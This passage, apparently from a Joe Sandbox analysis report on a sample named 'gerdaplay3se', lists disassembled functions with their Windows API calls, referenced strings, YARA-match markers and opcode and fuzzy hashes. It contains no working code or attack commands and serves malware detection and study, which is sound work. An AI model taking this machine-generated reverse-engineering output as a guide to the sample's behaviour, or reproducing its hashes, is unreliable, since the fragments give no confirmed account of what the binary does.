RtlEnterCriticalSection.NTDLL(00000020), ref: 02D696EE
RtlLeaveCriticalSection.NTDLL(00000020), ref: 02D6970C

Strings

Pz, xrefs: 02D696B2

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSection$EnterLeave$H_prolog
String ID: Pz
API String ID: 1633115879-1603573826
Opcode ID: f0a7e277d98d2691b6d42e295b45359a73eec1ecb3a4e0b10412a64a835cba69
Instruction ID: 1d9f69a29033454b0cffbccfad12d09406641e27c9fad738837a535e7e818bfa
Opcode Fuzzy Hash: f0a7e277d98d2691b6d42e295b45359a73eec1ecb3a4e0b10412a64a835cba69
Instruction Fuzzy Hash: 37216AB5910B019FD320DF6AD584BA6FBF4FF08710F50892EE54A87B40D330A914CBA0

Function 02D61F56 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D61F5B
CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,000000FF,?,00000000), ref: 02D61FC5
GetLastError.KERNEL32(?,00000000), ref: 02D61FD2

Part of subcall function 02D61712: __EH_prolog.LIBCMT ref: 02D61717

Strings

iocp, xrefs: 02D61FE0

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog$CompletionCreateErrorLastPort
String ID: iocp
API String ID: 998023749-976528080
Opcode ID: 408261d7606b27f5d759da59814505ab7d8160e33d8c6c1ee41d9d7bc1e09dc4
Instruction ID: b52f2584991697aa3d2a347a23196e1b95669f1dccee5330bbe78fd2ee7fe97f
Opcode Fuzzy Hash: 408261d7606b27f5d759da59814505ab7d8160e33d8c6c1ee41d9d7bc1e09dc4
Instruction Fuzzy Hash: ED21A4B1901B449FC7209F6AD50455BFBF9FF94720B108A1FD4A687B90D7B0AA04CFA1

Function 02D637B1 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 23COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D637B6
__localtime64.LIBCMT ref: 02D637C1

Part of subcall function 02D72540: __gmtime64_s.LIBCMT ref: 02D72553

std::exception::exception.LIBCMT ref: 02D637D9

Part of subcall function 02D72413: std::exception::_Copy_str.LIBCMT ref: 02D7242C

Part of subcall function 02D6A45F: __EH_prolog.LIBCMT ref: 02D6A464
Part of subcall function 02D6A45F: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D6A473
Part of subcall function 02D6A45F: __CxxThrowException@8.LIBCMT ref: 02D6A492

Strings

could not convert calendar time to UTC time, xrefs: 02D637CE

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog$Concurrency::cancellation_token::_Copy_strException@8FromImplThrow__gmtime64_s__localtime64std::exception::_std::exception::exception
String ID: could not convert calendar time to UTC time
API String ID: 1963798777-2088861013
Opcode ID: 1210934f02b16d77c843b45b804b0347296fb5b2264f9cb0a44aee1bb25ea497
Instruction ID: d1e2610ddecbb96661676ebe5ac5ba6976458e5b79b4fb77d0c59bd3622efff2
Opcode Fuzzy Hash: 1210934f02b16d77c843b45b804b0347296fb5b2264f9cb0a44aee1bb25ea497
Instruction Fuzzy Hash: 7DE06DB1D0024A9BCB00FFA0E8087FEB77AEF04304F5045A9D824A2750EB385E098FA5

Function 00403E3A Relevance: 6.3, APIs: 3, Strings: 1, Instructions: 265memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(?,00008000,00004000,7622DFF0,?,00000000), ref: 00404092
VirtualFree.KERNEL32(?,00000000,00008000), ref: 004040ED
HeapFree.KERNEL32(00000000,?), ref: 004040FF

Strings

-@, xrefs: 00403E3A

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Free$Virtual$Heap
String ID: -@
API String ID: 2016334554-2999422947
Opcode ID: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
Instruction ID: d55dda63c6158a3f001c35490e62a79414290c04420ce97baa52a0c06dad31a7
Opcode Fuzzy Hash: 9c389c61e5a6cd43db9238f188d86346d40478f5c1fa1013f45f36ce2e9b1707
Instruction Fuzzy Hash: D1B16C75A00205DFDB24CF04CA90AA9BBB1FB88314F24C1AED9196F396C735EE41CB84

Function 02D7C329 Relevance: 6.2, APIs: 4, Instructions: 162COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 02D7C3BA
_memmove.LIBCMT ref: 02D7C42E
___AdjustPointer.LIBCMT ref: 02D7C47F
_memmove.LIBCMT ref: 02D7C488

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: AdjustPointer_memmove
String ID:
API String ID: 1721217611-0
Opcode ID: 6031f670ab57bf863635bc97f2b3dfc07fbbe0f9a9d893e57def7090a14211b0
Instruction ID: 89d38d1b3fac3c21218e0dcf11fce7d5b7db7373426569c4fbec444f0f238a69
Opcode Fuzzy Hash: 6031f670ab57bf863635bc97f2b3dfc07fbbe0f9a9d893e57def7090a14211b0
Instruction Fuzzy Hash: BE41A1362143029EEB346F64D850B7A33E6EF01718F14446FE889863E0FB29FD85DA21

Function 02D71260 Relevance: 6.1, APIs: 4, Instructions: 148COMMONLIBRARYCODE

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,02D64149), ref: 02D712FF

Part of subcall function 02D63FDC: __EH_prolog.LIBCMT ref: 02D63FE1
Part of subcall function 02D63FDC: CreateEventA.KERNEL32(00000000,?,?,00000000), ref: 02D63FF3

CloseHandle.KERNEL32(00000000), ref: 02D712F4
CloseHandle.KERNEL32(00000004,?,?,?,?,?,?,?,?,?,?,?,02D64149), ref: 02D71340
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,02D64149), ref: 02D71411

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CloseHandle$Event$CreateH_prolog
String ID:
API String ID: 2825413587-0
Opcode ID: ef7a9c383efb53d8ab225c4df7abe22ecc1ec39e27bb36698856f35c8c262113
Instruction ID: 553480ad1861e06c2443cc8918b2d61bdd5c770092fede61c1f97bde9ef62846
Opcode Fuzzy Hash: ef7a9c383efb53d8ab225c4df7abe22ecc1ec39e27bb36698856f35c8c262113
Instruction Fuzzy Hash: 9C517D756007458BDB21DF28C88479ABBE5FF48328F294728E8AD97390E739DC05CB91

Function 02D736F0 Relevance: 6.1, APIs: 4, Instructions: 136COMMON

Download Yara Rule

APIs

_memmove.LIBCMT ref: 02D73786
__flush.LIBCMT ref: 02D737A6
__write.LIBCMT ref: 02D737D9
__flsbuf.LIBCMT ref: 02D73807

Part of subcall function 02D75D9B: __getptd_noexit.LIBCMT ref: 02D75D9B

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: __flsbuf__flush__getptd_noexit__write_memmove
String ID:
API String ID: 2782032738-0
Opcode ID: acdac2ea7175f400f5f91947118356792f48efd8ea4696cdf33623925e283fbc
Instruction ID: 988be52a7df488a428a64fdc9d24bc80171aa55d720251e2ce29d61c29c7f9b9
Opcode Fuzzy Hash: acdac2ea7175f400f5f91947118356792f48efd8ea4696cdf33623925e283fbc
Instruction Fuzzy Hash: A84104B6A00706ABDB988F69C8C05AE7BB6EF40364B1082BDE855C7380F778DD41DB50

Function 02D7FE55 Relevance: 6.1, APIs: 4, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 02D7FE8B
__isleadbyte_l.LIBCMT ref: 02D7FEB9
MultiByteToWideChar.KERNEL32(?,00000009,00000108,?,00000000,00000000), ref: 02D7FEE7
MultiByteToWideChar.KERNEL32(?,00000009,00000108,00000001,00000000,00000000), ref: 02D7FF1D

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: d2d10dd5f8c23480bce000bc7ffdbbde52f7fdb2b30e1d9af8e6e714658ac66f
Instruction ID: 2938a1dac503f1ea3f8d36ad1389e5b912d632d3718505526e3e3f365b56c070
Opcode Fuzzy Hash: d2d10dd5f8c23480bce000bc7ffdbbde52f7fdb2b30e1d9af8e6e714658ac66f
Instruction Fuzzy Hash: 8531A131604246AFDB318F65CC44BBABBA9FF41324F154568E86887AD1F734DC51CBA0

Function 004047B2 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 66COMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(FFFFFFFF,00001000,00004000,7622DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3,?,?), ref: 004047F0

Strings

-@, xrefs: 004047B2
r@, xrefs: 004047B8
r@, xrefs: 00404856

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: FreeVirtual
String ID: -@$r@$r@
API String ID: 1263568516-1251997348
Opcode ID: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
Instruction ID: a63ca1888fca441bf056fbcf5d5deb39584b298cc2094c54b415f4e68fc1e946
Opcode Fuzzy Hash: db728298b98a3dab2ecdb4dab480861bd9016d5beafec50a15f5b98851f5bcbc
Instruction Fuzzy Hash: EE21A1B66003419BDB20AB24DD4476633A4EB81379F24CA3BDB65B66D0D378E941CB58

Function 02D63D7E Relevance: 6.1, APIs: 4, Instructions: 57networkCOMMON

Download Yara Rule

APIs

htons.WS2_32(?), ref: 02D63DA2

Part of subcall function 02D63BD3: __EH_prolog.LIBCMT ref: 02D63BD8
Part of subcall function 02D63BD3: std::bad_exception::bad_exception.LIBCMT ref: 02D63BED

htonl.WS2_32(00000000), ref: 02D63DB9
htonl.WS2_32(00000000), ref: 02D63DC0
htons.WS2_32(?), ref: 02D63DD4

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: htonlhtons$H_prologstd::bad_exception::bad_exception
String ID:
API String ID: 3882411702-0
Opcode ID: a2a63c57e4ae5ffd123ef968d59c33b83bafa4580da39bfd2ced241a79cf601b
Instruction ID: 197a980cd73b0a0ed2b491e052740e4768c386e9ef72879a695eb9b6e8cffafe
Opcode Fuzzy Hash: a2a63c57e4ae5ffd123ef968d59c33b83bafa4580da39bfd2ced241a79cf601b
Instruction Fuzzy Hash: EB117035910209EBDF019F64D889A6AB7B9EF09710F108496FC04DF345D6719E14CBA1

Function 02D6239D Relevance: 6.1, APIs: 4, Instructions: 52COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000000), ref: 02D623D0
RtlEnterCriticalSection.NTDLL(?), ref: 02D623DE
InterlockedExchange.KERNEL32(?,00000001), ref: 02D62401
RtlLeaveCriticalSection.NTDLL(?), ref: 02D62408

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
String ID:
API String ID: 4018804020-0
Opcode ID: a52abba82188cbbfc97c4d097ef033afd8ac13f974bef01c4a83db573e99ba27
Instruction ID: 87ac632aeaa4245b6f2ae818c5558134c4a6d1c70b24f96c04c67e56ca101ab5
Opcode Fuzzy Hash: a52abba82188cbbfc97c4d097ef033afd8ac13f974bef01c4a83db573e99ba27
Instruction Fuzzy Hash: 6511CE31A10204ABEB109F60DC88B76BBB8FF50709F24446DE9019B640E7B1FD11CBA0

Function 02D7C77B Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 02D7C79F

Part of subcall function 02D7CE86: __fltout2.LIBCMT ref: 02D7CEAF

__cftog_l.LIBCMT ref: 02D7C7C5
__cftoe_l.LIBCMT ref: 02D7C7F7

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 39d247dd303399480e88bdfda03b7bfd51642aad8d0397ed9daa7d49bcb167f4
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: 6601107201014EBFCF225E84CC418EE3F67BB18354F488416FA5859231E73AC9B1EB91

Function 02D6247D Relevance: 6.0, APIs: 4, Instructions: 38COMMON

Download Yara Rule

APIs

PostQueuedCompletionStatus.KERNEL32(?,00000000,00000002,?), ref: 02D624A9
RtlEnterCriticalSection.NTDLL(?), ref: 02D624B8
InterlockedExchange.KERNEL32(?,00000001), ref: 02D624CD
RtlLeaveCriticalSection.NTDLL(?), ref: 02D624D4

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CriticalSection$CompletionEnterExchangeInterlockedLeavePostQueuedStatus
String ID:
API String ID: 4018804020-0
Opcode ID: b1b6a859db04ede1f36d750810872672e035261a74a52555616072a243cd3e47
Instruction ID: 537e2ed4b1041d159894869700e17c65fa300da7415cf63d37cd52a3bb181144
Opcode Fuzzy Hash: b1b6a859db04ede1f36d750810872672e035261a74a52555616072a243cd3e47
Instruction Fuzzy Hash: 23F03C76540205AFEB009F69EC48FAABBBCFF54711F204429FA05DA241D771E960CFA0

Function 02D62004 Relevance: 6.0, APIs: 4, Instructions: 35COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D62009
RtlDeleteCriticalSection.NTDLL(?), ref: 02D62028
CloseHandle.KERNEL32(00000000), ref: 02D62037
CloseHandle.KERNEL32(00000000), ref: 02D6204E

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: CloseHandle$CriticalDeleteH_prologSection
String ID:
API String ID: 2456309408-0
Opcode ID: 638142d3319d9e77140b9e1ab51779761895410c89b23a0524ac2b82aef17b62
Instruction ID: 579005bf0faaaccdacf7d839cf71f1e2c921887477b73e0baf87a413213d095a
Opcode Fuzzy Hash: 638142d3319d9e77140b9e1ab51779761895410c89b23a0524ac2b82aef17b62
Instruction Fuzzy Hash: 6D01A9318006049BD334AFA4E90C7AABBB5FF04708F204A5DE84692790CBB46D48CF60

Function 02D61E26 Relevance: 6.0, APIs: 4, Instructions: 30COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D61E2B
SetEvent.KERNEL32(00000000), ref: 02D61E3F
SetEvent.KERNEL32(?), ref: 02D61E58
SleepEx.KERNEL32(000000FF,00000001), ref: 02D61E62

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Event$H_prologSleep
String ID:
API String ID: 1765829285-0
Opcode ID: 27aec824736060dd5848c4d87b9c5daab82b677e594bd1a313092ecc8e2b6162
Instruction ID: abbd0be2777b8da41a974a654c5ddd58b9778c8ad2f8e4562a5d73c525883cc0
Opcode Fuzzy Hash: 27aec824736060dd5848c4d87b9c5daab82b677e594bd1a313092ecc8e2b6162
Instruction Fuzzy Hash: ECF03A76650110EFDB00AFA4E8C8B88BBB4FF09321F6081A9FA199B390C7759C54CB61

Function 0040475C Relevance: 6.0, APIs: 2, Strings: 2, Instructions: 27memoryCOMMON

Download Yara Rule

APIs

VirtualFree.KERNEL32(00000000,00000000,00008000,r@,0040485C,r@,7622DFF0,?,00000000,?,-@,0040490E,00000010,00402FA3), ref: 0040476B
HeapFree.KERNEL32(00000000,?), ref: 004047A1

Strings

r@, xrefs: 00404771, 0040477C
r@, xrefs: 0040475C, 00404781

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Free$HeapVirtual
String ID: r@$r@
API String ID: 3783212868-1712950306
Opcode ID: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
Instruction ID: 9f28707f468f96f8ba01f1c404cbd9d3f6c084a3717c71e7c0065962692db169
Opcode Fuzzy Hash: 615be266f2133a35edff91ca5e545c140f31fce35e26d2f64644c01e7612d901
Instruction Fuzzy Hash: C6F01774544210DFC3248F08EE08A427BA0FB88720B11867EF996672E1C371AC50CF88

Function 02D69E8C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 179COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D69E91
_memmove.LIBCMT ref: 02D69F8B

Strings

&', xrefs: 02D69F72

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog_memmove
String ID: &'
API String ID: 3529519853-655172784
Opcode ID: a12ec99faca517ecfa6097741f95eb97d2cb0f2fb9c87dfd81ca8a2e2782517d
Instruction ID: 7bf130f485e252087f7ba3fbc41184dbdabff7997c15efeceb0853228b4b2e08
Opcode Fuzzy Hash: a12ec99faca517ecfa6097741f95eb97d2cb0f2fb9c87dfd81ca8a2e2782517d
Instruction Fuzzy Hash: 93615B71D012199FDF21EFA4C998AEDBBB6EF48310F11416AD405BB290E7709E45CBA1

Function 00404EBD Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(?,00000000), ref: 00404ED1

Strings

, xrefs: 00404F1A
, xrefs: 00404EF6

Memory Dump Source

Source File: 00000003.00000002.3368613659.0000000000400000.00000040.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.3368613659.0000000000409000.00000040.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_gerdaplay3se.jbxd

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
Instruction ID: e64d793a5bd47a750bf71bc710b27f1b951018593c94bf49e3c2bba34da37a12
Opcode Fuzzy Hash: ade2e129719512a706aeac876f0a8c01095c6a06ec5d81e25aee3eb1febfb5f9
Instruction Fuzzy Hash: 1D416B710142985EEB169714CE59FEB3FE8EB02704F1404F6DA49F61D2C2794924DBBB

Function 02D695A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 78networkCOMMON

Download Yara Rule

APIs

WSASetLastError.WS2_32(00000000,?,?,?,?,?,?,?,02D6830A,?,?,00000000), ref: 02D69607
getsockname.WS2_32(?,?,?), ref: 02D6961D

Strings

&', xrefs: 02D69650

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: ErrorLastgetsockname
String ID: &'
API String ID: 566540725-655172784
Opcode ID: 10ac9c37f9e4f1d8b0c75f38b830b7b89c2340109692e044f40a6a9f32ae2ae8
Instruction ID: b54001aa34fdbd65fff4ea53b98ea7fd91c002377f448f45052014e62b6ae5a5
Opcode Fuzzy Hash: 10ac9c37f9e4f1d8b0c75f38b830b7b89c2340109692e044f40a6a9f32ae2ae8
Instruction Fuzzy Hash: 9D215176A04248DBDB10DFA8D845ADEB7F5FF48324F10856AE918EB380E734ED458B61

Function 02D6CBE6 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 75COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6CBEB

Part of subcall function 02D6D1C7: std::exception::exception.LIBCMT ref: 02D6D1F6

Part of subcall function 02D6D97D: __EH_prolog.LIBCMT ref: 02D6D982

Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7

Part of subcall function 02D6D226: __EH_prolog.LIBCMT ref: 02D6D22B

Strings

C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp, xrefs: 02D6CC28
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 02D6CC21

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog$_mallocstd::exception::exception
String ID: C:\boost_1_55_0\staging\include\boost-1_55\boost/exception/detail/exception_ptr.hpp$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void)
API String ID: 1953324306-1943798000
Opcode ID: aade798ca4dd73a47c23e8632467407a8e8fd026e458a0050e0b3db751b997a4
Instruction ID: 6924ffef5a9e2782c8ad8241b7f3561bbe353a7fe816803e30aa6ac61373037d
Opcode Fuzzy Hash: aade798ca4dd73a47c23e8632467407a8e8fd026e458a0050e0b3db751b997a4
Instruction Fuzzy Hash: FE218071E052449BDB14EFE4E958AFEBBBAEF15704F00405EE845AB380DB705E44CBA1

Function 02D6534D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 72COMMON

Download Yara Rule

APIs

_malloc.LIBCMT ref: 02D6535D

Part of subcall function 02D72EEC: __FF_MSGBANNER.LIBCMT ref: 02D72F03
Part of subcall function 02D72EEC: __NMSG_WRITE.LIBCMT ref: 02D72F0A
Part of subcall function 02D72EEC: RtlAllocateHeap.NTDLL(00790000,00000000,00000001), ref: 02D72F2F

SHGetSpecialFolderPathA.SHELL32(00000000,00000000,00000023,00000000), ref: 02D6536F

Strings

\save.dat, xrefs: 02D65383

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: AllocateFolderHeapPathSpecial_malloc
String ID: \save.dat
API String ID: 4128168839-3580179773
Opcode ID: 32e84d67a6cca73b763006a819898044a222edb626688371c48aec68f40292fe
Instruction ID: eec6cc9a0751c8c81f9324a3d5251cac44b3caadba7141ee21616fe6b666a7cd
Opcode Fuzzy Hash: 32e84d67a6cca73b763006a819898044a222edb626688371c48aec68f40292fe
Instruction Fuzzy Hash: E1117A329042406BEB259E759C84D7FFF6BDF82A50B1401A9E8846B342E7A20D02C6B0

Function 02D63965 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D6396A
std::runtime_error::runtime_error.LIBCPMT ref: 02D639C1

Part of subcall function 02D61410: std::exception::exception.LIBCMT ref: 02D61428

Part of subcall function 02D6A555: __EH_prolog.LIBCMT ref: 02D6A55A
Part of subcall function 02D6A555: Concurrency::cancellation_token::_FromImpl.LIBCPMT ref: 02D6A569
Part of subcall function 02D6A555: __CxxThrowException@8.LIBCMT ref: 02D6A588

Strings

Day of month is not valid for year, xrefs: 02D639AC

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog$Concurrency::cancellation_token::_Exception@8FromImplThrowstd::exception::exceptionstd::runtime_error::runtime_error
String ID: Day of month is not valid for year
API String ID: 1404951899-1521898139
Opcode ID: a94dbd409c2e66012ce37706d0afc85f5c9b076271fdf86d87f95e7d0eb3a5f8
Instruction ID: c309ea89aa96fa48e26fddadc4094b0a9b8abfa62f3008be0bd05309ea3b42bd
Opcode Fuzzy Hash: a94dbd409c2e66012ce37706d0afc85f5c9b076271fdf86d87f95e7d0eb3a5f8
Instruction Fuzzy Hash: A9015E76914209ABDB04FFA4D809AFEB779FF14710F40801AEC04A7740EB709E55CBA5

Function 02D6B037 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34COMMON

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 02D6FA4E
__CxxThrowException@8.LIBCMT ref: 02D6FA63

Part of subcall function 02D73A8F: _malloc.LIBCMT ref: 02D73AA7

Strings

bad allocation, xrefs: 02D6FA43

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: Exception@8Throw_mallocstd::exception::exception
String ID: bad allocation
API String ID: 4063778783-2104205924
Opcode ID: 2bf8285e1d08a95dce85e288b7f639f4c3f7472fb322c0d9db85dacb32e57000
Instruction ID: f00ffde967f06b43814e0cf78bd9fd0f3efd106a130e512ef1a9e95c8eb85870
Opcode Fuzzy Hash: 2bf8285e1d08a95dce85e288b7f639f4c3f7472fb322c0d9db85dacb32e57000
Instruction Fuzzy Hash: 10F0E97160430D5BDF04EA9499099BF77ACEB00305F900566A521F2781EB70EE048560

Function 02D63C16 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 02D63C1B
std::bad_exception::bad_exception.LIBCMT ref: 02D63C30

Part of subcall function 02D723F7: std::exception::exception.LIBCMT ref: 02D72401

Part of subcall function 02D6A58E: __EH_prolog.LIBCMT ref: 02D6A593
Part of subcall function 02D6A58E: __CxxThrowException@8.LIBCMT ref: 02D6A5BC

Strings

bad cast, xrefs: 02D63C28

Memory Dump Source

Source File: 00000003.00000002.3372534364.0000000002D61000.00000040.00001000.00020000.00000000.sdmp, Offset: 02D61000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_2d61000_gerdaplay3se.jbxd

Yara matches

Similarity

API ID: H_prolog$Exception@8Throwstd::bad_exception::bad_exceptionstd::exception::exception
String ID: bad cast
API String ID: 1300498068-3145022300
Opcode ID: 59ba2e9933879fc19bdab4a2f6f7ec6438a9668768be4ea393d9925b8c60ae12
Instruction ID: 68ee620a4fe708bc6da29705dd117dc52c766385e79f118873ea3ed4c672d335
Opcode Fuzzy Hash: 59ba2e9933879fc19bdab4a2f6f7ec6438a9668768be4ea393d9925b8c60ae12
